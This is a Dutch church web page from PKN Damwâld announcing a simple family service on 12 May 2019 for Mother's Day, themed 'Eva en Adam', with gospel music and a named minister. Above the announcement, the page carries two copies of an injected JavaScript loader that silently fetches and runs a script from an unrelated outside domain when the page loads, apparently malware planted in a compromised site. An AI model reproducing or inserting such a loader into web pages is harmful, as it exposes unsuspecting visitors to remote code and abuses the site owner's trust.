;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Speciale 'Memmedei' ... aangepaste gezinsdienst 12 mei - PKN Damwâld

Speciale ‘Memmedei’ … aangepaste gezinsdienst 12 mei

Gepubliceerd op: donderdag 25 april 2019

De laatste aangepaste gezinsdienst was in de Christelijk Gereformeerde Kerk in Broeksterwâld. Met dominee Arrie Mak en muziekgroep Gryn werd het echt een prachtige dienst. Het thema was “Je hoeft niet bang te zijn”. Mooi was ook de volle kerk en ook de bezoekers waren zeer enthousiast.

De eerstvolgende gezinsdienst is op 12 mei, om 14.00 uur in de Gereformeerde kerk De ontmoeting, Foarwei 48 in Damwâld. Aangepaste gezinsdiensten zijn eenvoudige diensten, die bovendien ook heel geschikt zijn voor jonge gezinnen met kinderen. Deze diensten zijn vooral gericht op de mensen van de aangepaste catechisaties in Damwâld en zij zullen uiteraard hun medewerking verlenen aan deze dienst. Gospelgroep Sign zorgt voor de muzikale begeleiding en dominee Boukes zal de dienst leiden. Het thema is “ Eva en Adam “. Eva was de eerste vrouw en mem. Dit thema was een voorstel van één van de catechisanten. Het lijkt een mooi thema voor deze Moederdag. Iedereen is van harte welkom bij deze dienst. Het wordt zeker weer een levendige dienst.